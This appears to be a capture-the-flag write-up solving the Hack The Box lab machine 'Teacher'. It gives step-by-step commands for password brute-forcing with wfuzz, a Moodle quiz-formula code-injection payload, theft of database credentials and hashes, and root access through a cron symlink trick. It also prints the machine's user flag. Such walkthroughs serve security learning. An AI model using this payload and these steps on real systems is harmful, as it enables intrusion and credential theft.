Today we’re going to solve another CTF machine “Teacher”. It is now retired box and can be accessible if you’re a VIP member.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.153
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -sS -sU -T4 -A -v 10.10.10.153

Enumeration

Let’s do some enumeration and browse URL http://10.10.10.153/

We have do directory enumeration to find hidden directories or files.

Dirb

dirb http://10.10.10.153 -o /root/Documents/hackthebox/10.10.10.153/scans/10.10.10.153_dirb.txt

Result

DIRECTORY: http://10.10.10.153/moodle/

We found moodle CMS installed on 10.10.10.153/moodle location.

After that we have to login in order to move forward but we don’t have credential and there’s only guest:guest login.

Let’s find username first, there’s a simple technique to find username you have to go to forgot password and enter random usernames to see if they verify that password has been sent for this username etc.. something like that so we can be sure of that username availability.

I found two usernames: admin | giovanni

Now, we have to enumerate more in order to find password.

Let’s take a look at source code of view-source:http://10.10.10.153/gallery.html and see if there’s something odd.

We see onerror="console.log('That\'s an F');"

Let’s take a look at the image!

Now curl this image and see what’s it’s hiding.

curl -O http://10.10.10.153/images/5.png

We can rename 5.png to 5.txt and cat the text file.

Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

We have a password: Th4C00lTheacha but it’s incomplete and we don’t know what’s the last digit it include.

Creating WordList Using Crunch

We’re gonna create different wordlists in order to find the last digit for our password.

crunch 15 15 Th4C00lTheacha -t Th4C00lTheacha^ -o wordlist1.txt
crunch 15 15 Th4C00lTheacha -t [email protected] -o wordlist2.txt
crunch 15 15 Th4C00lTheacha -t Th4C00lTheacha, -o wordlist3.txt
crunch 15 15 Th4C00lTheacha -t Th4C00lTheacha% -o wordlist4.txt

WFuzz

We can also use SecList Fuzzing wordlists alphanum-case-extra.txt

wfuzz -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt --hh 440 -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" --hw 1224 http://10.10.10.153/moodle/login/index.php

We found our password: Th4C00lTheacha#

Burp Suite

Low-Privilege Shell

We have found credential for Moodle CMS. let’s move forward and find a way to exploit.

https://blog.ripstech.com/2018/moodle-remote-code-execution/

After logging in and prodding around the environment, we stumble across a page that lets us upload custom questions for a Quiz. This is exactly the page we needed, as previous research has indicated that this version of Moodle has a security flaw which allows a teacher to execute code within the custom quiz creation.

Let’s get started!

Login to moodle

Username: giovanni Password: Th4C00lTheacha#

Go to http://10.10.10.153/moodle/course/view.php?id=2 Click Turn editing on.

After that click on Add an activity or resource.

A pop-up window will appear asking to add activity or resource select Quiz and Add.

Now, name your quiz and click save.

Now, click on Edit quiz

 

And click on a new question

A pop-up window will appear and select Calculated and Add.

Now here in the formula add /*{a*/`$_GET[0]`;//{x}}

After clicking on Save changes we can get reverse shell.

Now, that we have got low privilege let’s upgrade shell.

python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www/html/moodle/question$

First let’s take a look around in moodle source code to find config file.

[email protected]:/var/www/html/moodle$ cat config.php
cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

We got database credentials root:Welkom1!

Connect to the mysql console.

[email protected]:/var/www/html/moodle$ mysql -u root -pWelkom1! -D moodle
MariaDB [moodle]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| moodle             |
| mysql              |
| performance_schema |
| phpmyadmin         |
+--------------------+
5 rows in set (0.00 sec)

Let’s take a look inside moodle database and look for users tables or similar where we can find credentials.

MariaDB [moodle]> select * from mdl_user;
select * from mdl_user;
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
| id   | auth   | confirmed | policyagreed | deleted | suspended | mnethostid | username    | password                                                     | idnumber | firstname  | lastname | email          | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin  | currentlogin | lastip        | secret | picture | url | description                                                               | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
|    1 | manual |         1 |            0 |       0 |         0 |          1 | guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |          | Guest user |          | [email protected] |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |        |       0 |     | This user is a special user that allows read-only access to some courses. |                 1 |          1 |          0 |           2 |             1 |           0 |           0 |   1530058999 |            0 | NULL     | NULL             | NULL              | NULL       | NULL          |
|    2 | manual |         1 |            0 |       0 |         0 |          1 | admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |          | Admin      | User     | [email protected]     |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059097 | 1530059573 | 1530059097 |   1530059307 | 192.168.206.1 |        |       0 |     |                                                                           |                 1 |          1 |          0 |           1 |             1 |           0 |           0 |   1530059135 |            0 | NULL     |                  |                   |            |               |
|    3 | manual |         1 |            0 |       0 |         0 |          1 | giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |          | Giovanni   | Chhatta  | [email protected]    |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059681 | 1550655334 | 1550655159 |   1550655250 | 10.10.13.113  |        |       0 |     |                                                                           |                 1 |          1 |          0 |           2 |             1 |           0 |  1530059291 |   1530059291 |            0 |          |                  |                   |            |               |
| 1337 | manual |         0 |            0 |       0 |         0 |          0 | Giovannibak | 7a860966115182402ed06375cf0a22af                             |          |            |          |                |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |        |       0 |     | NULL                                                                      |                 1 |          1 |          0 |           2 |             1 |           0 |           0 |            0 |            0 | NULL     | NULL             | NULL              | NULL       | NULL          |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
4 rows in set (0.00 sec)

We got MD5 hash let’s decrypt it using online crackers first.

7a860966115182402ed06375cf0a22af : expelled

Let’s try switching to giovanni user in reverse shell.

[email protected]:/var/www/html/moodle$ su giovanni
su giovanni
Password: expelled

[email protected]:/var/www/html/moodle$

We can find user.txt flag

[email protected]:~$ cat user.txt
cat user.txt
fa9ae187462530e841d9e61936648fa7

Privilege Escalation

After checking few things we found a process running through cron jobs and executing as root. We can use pspy tool to see a cron running very few seconds.

[email protected]:/tmp$ ./pspy32s
...
2019/02/20 11:42:01 CMD: UID=0    PID=3273   | /bin/bash /usr/bin/backup.sh 
...
[email protected]:~$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

Let’s create a symlink between the root file and cron file.

[email protected]:~/work$ ln -s /root courses
ln -s /root courses
[email protected]:~/work$ ls -l
ls -l
total 8
lrwxrwxrwx 1 giovanni giovanni 5 Apr 16 17:00 courses -> /root
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses.bak
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp

Let the cron job do it’s thing and wait for your root file.

[email protected]:~/work/tmp/courses$ ls -l
ls -l
total 8
drwxrwxrwx 2 root root 4096 Jun 27 2018 algebra
-rwxrwxrwx 1 root root 33 Jun 27 2018 root.txt